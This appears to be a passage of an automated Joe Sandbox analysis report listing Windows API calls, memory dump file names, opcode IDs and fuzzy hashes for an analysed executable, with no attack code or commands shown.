                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b286a0ec745fcbff6259512998256405701aab5c3275a24f431169060974f498
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ee9f2f09b47fc2c50bad74e6ae979ffb0fa902b6e59ceb7e3b1efa1afaa7aa4d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b286a0ec745fcbff6259512998256405701aab5c3275a24f431169060974f498
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C41A5719011199FDB20FF68DC89AEAB77AEF86305F149199E405D7181EB349E80CF64
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006533D5
                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 006534A1
                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006534C1
                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 006534CB
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 12f0e1c443b75952b2b4fa4d76b9bc9436d0c7f62622485a451be5c10205444e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6159406174d32034a4158fb78671f49e25c54330f2bc4882251a8bfa6e05da13
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12f0e1c443b75952b2b4fa4d76b9bc9436d0c7f62622485a451be5c10205444e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E310975D4522C9BDB21DFA4D989BCCBBF8AF08300F10409AE409AB250EB759B85DF45
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 0062D746
                                                                                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 0062D768
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                                                                                                  • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                                                                                                  • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 211f0b55406892c105e7f3bc5bef1013d3b4cfff6662ebed49164ee6ca2f61ac
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5d9bb95392bc9951ba9c3ccc06578a8ca2211273da805e756f8bb5a9723660f4
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 211f0b55406892c105e7f3bc5bef1013d3b4cfff6662ebed49164ee6ca2f61ac
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDE039B6154208FEEB089FA0CC0BDFB7AADEB08760B008119B906D2190E2B56E00CA74
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 006645AD
                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006645B7
                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 006645C4
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 331b92474c3340d3b67da9e8960c53579d28bd3d5080fbb1a58c51f7413b936f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f4c850ab5a35ba8634d45f625817b3f675fcd2ea477fd2345e4b537d59cc8088
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 331b92474c3340d3b67da9e8960c53579d28bd3d5080fbb1a58c51f7413b936f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B231C67490122CABCB61DF28D9897CCBBB5BF58310F5081DAE41DA7290EB749F858F44
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d09462b6063f579f42e277fc0cfdd7ba4844cbca0b6df2c3be4cba143b4e708f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: cb359173c7bbf437ab71477a65802d76a7833dc545ea64a6fe9ec2cfdc45959e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d09462b6063f579f42e277fc0cfdd7ba4844cbca0b6df2c3be4cba143b4e708f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA519375804219AFDF14EF79CC89AEABBBAEF45300F14429DE419D3242EB319E858F54
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00652FED
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4364d63e0b227d0b958b8d66e51510311c9ad11796d1fd7c4a07a04554311429
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4c538f90db73aaf33b24a80b5c54b06e0522401a97c55c55f392d725325705e1
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4364d63e0b227d0b958b8d66e51510311c9ad11796d1fd7c4a07a04554311429
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E651A2B1A01619CBEB19CF69D8857EEB7F2FB48752F24C029D804E7390D3789A44CB94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  • GetSystemTimePreciseAsFileTime, xrefs: 006A1F37
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-595813830
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 194c9dbcbd2c6d86b8363baff0f635348f5efcb686ef269d712b6ba461d5ce71
                                                                                                                                                                                                                                                                                                                  • Instruction ID: a18ac4f65cb0586bf4470c4df977dfcdb23cb692e659824c30bc4c6ce401fe1f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 194c9dbcbd2c6d86b8363baff0f635348f5efcb686ef269d712b6ba461d5ce71
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE0CD3278032467C3103344EC06FE97B57CB42BB1F098035FA0C65181D5A54C11C6D4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062665A
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00626662
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062666A
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00626672
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062667A
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00626682
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062668A
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00626692
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062669A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a960f3a6e8a219fa059d9aa4dce09929a6e2af972c97dc70c411a3cf5b6156d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 912386f0e236d3b7dbd93d8c1ab873a6ad2cab4fe858d26512af22dacd30a523
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a960f3a6e8a219fa059d9aa4dce09929a6e2af972c97dc70c411a3cf5b6156d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9101EC1164CBBE26E37167BC9C51BABBE44AF46722F050296F2D8590C69B9C20118BA3
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006284F2
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006284FD
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00628508
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00628513
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062851E
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00628529
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00628534
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062853F
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062854A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b022a9ec9dca03c49b4dc29f5ceb206613370b94c3bd67e7bb6ad355f921c818
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ae6777996e1423770168d5d38660dc3677d10a9b4827951d03a583a0e73fb74
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b022a9ec9dca03c49b4dc29f5ceb206613370b94c3bd67e7bb6ad355f921c818
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B201A21024CBC419E3317B788C19B8E9AC33F837EBF068A8CD1ED1C1C66FA421419A13
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00627972
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062797D
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00627988
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00627993
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0062799E
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006279A9
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006279B4
